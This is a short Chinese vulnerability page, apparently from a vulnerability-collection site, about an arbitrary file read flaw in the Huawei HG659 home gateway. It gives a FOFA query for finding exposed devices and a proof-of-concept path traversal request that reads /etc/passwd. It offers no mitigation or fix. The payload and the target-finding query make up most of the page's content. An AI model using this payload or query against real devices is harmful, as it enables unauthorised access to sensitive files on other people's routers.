华为HG659_任意文件__读取漏洞-棉花糖会员站

华为HG659_任意文件__读取漏洞

7月15日发布

050

# 华为HG659 任意文件读取漏洞

## 漏洞描述

华为 HG659 lib 存在任意文件读取漏洞，攻击者通过漏洞可以读取任意文件

## 漏洞影响

> 华为HG659

## FOFA

> app=”HUAWEI-Home-Gateway-HG659″

## 漏洞复现

登录页面如下：

![1](/static/qingy/华为HG659_任意文件__读取漏洞/img/1.png)

###POC

“`
/lib///….//….//….//….//….//….//….//….//etc//passwd
“`

![2](/static/qingy/华为HG659_任意文件__读取漏洞/img/2.png)

© 版权声明

文章版权归作者所有，未经允许请勿转载。

THE END

国内漏洞库

喜欢就支持一下吧

相关推荐

评论抢沙发

请登录后发表评论

请登录后查看评论内容